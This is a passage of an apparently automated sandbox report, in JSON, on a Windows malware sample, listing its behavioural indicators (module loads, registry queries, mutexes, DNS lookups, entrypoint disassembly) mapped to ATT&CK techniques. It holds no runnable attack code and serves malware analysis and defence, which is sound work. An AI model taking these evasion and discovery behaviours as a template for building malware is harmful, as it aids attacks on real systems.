76790000\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" loaded module \"KERNEL32.DLL\" at base 76790000\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75590000\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 750f0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\DBWinMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\a47014b09dec2c3c6fccf840b5a89840\"\n \"Global\\a47014b09dec2c3c6fccf840b5a89840\"\n \"DBWinMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\{AD3EBBCA-D942-886C-AD3E-CABB824AEA00}\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,sub\tesp, 0x20,call\tdword ptr [0x402018],push\teax,call\t0x401605,pop\tecx,call\t0x4014f7,push\t0x14,xor\tedx, edx,mov\tbyte ptr [ebp - 0x20], 0,pop\tecx,div\tecx,add\tedx, 0xe,mov\tdword ptr [ebp - 0x1c], edx,lea\teax, [ebp - 0x20],push\teax,call\t0x4017c1,pop\tecx,test\tal, al,jne\t0x4016c1,push\t0,call\tdword ptr [0x402014],int3\t,push\tebp,mov\tebp, esp,sub\tesp, 0x114,push\tebx,push\tesi,push\tedi,mov\tesi, 0x54636,push\tesi,call\t0x401100,push\tesi,mov\tebx, eax,push\t0x402060,push\tebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"ResumeThread\" (Indicator: \"ResumeThread\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-269", "type": 2, "relevance": 1, "name": "Contains reference to method used by Windows shell items (API string)", "description": "Found reference to API \"SHFileOperationW\" (Indicator: \"SHFileOperation\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"GetProcAddress\" with a parameter RtlComputeCrc32 (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"GetProcAddress\" with a parameter BaseThreadInitThunk (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:443\"\n \"<IPv4>:80\"\n \"<IPv4>:443\"\n \"<IPv4>:13\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"api.ipify.org\"\n \"time-a.nist.gov\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on process \"00000000-00001188\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"ReleaseMutex\" (Indicator: \"ReleaseMutex\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"OpenMutexW\" (Indicator: \"OpenMutex\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateMutexW\" (Indicator: \"CreateMutex\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" was detected as \"Borland Delphi 3.0 (???)\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-455", "type": 2, "relevance": 3, "name": "Contains reference to multiple windows system processes", "description": "Found strings \"svchost.exe,spoolsv.exe,smss.exe,csrss.exe,wininit.exe\" (Source: \"00000000-00001188.00000001.298674.034B0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00D92000.00000002.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CRYPT32\"; Key: \"DEBUGHEAPFLAGS\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"3BB3C2ED190CECE40387A4F95B14E384D6CC46E77C6F75A22BD64A6D87BFFFEF\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\FILEINFO\\INSTANCES\\FILEINFO\"; Key: \"FLAGS\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\FILEINFO\\INSTANCES\\FILEINFO\"; Key: \"ALTITUDE\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LUAFV\\INSTANCES\\LUAFV\"; Key: \"FLAGS\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LUAFV\\INSTANCES\\LUAFV\"; Key: \"ALTITUDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\secur32.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\DNSAPI.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\rasadhlp.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\credssp.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CRYPT32\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file 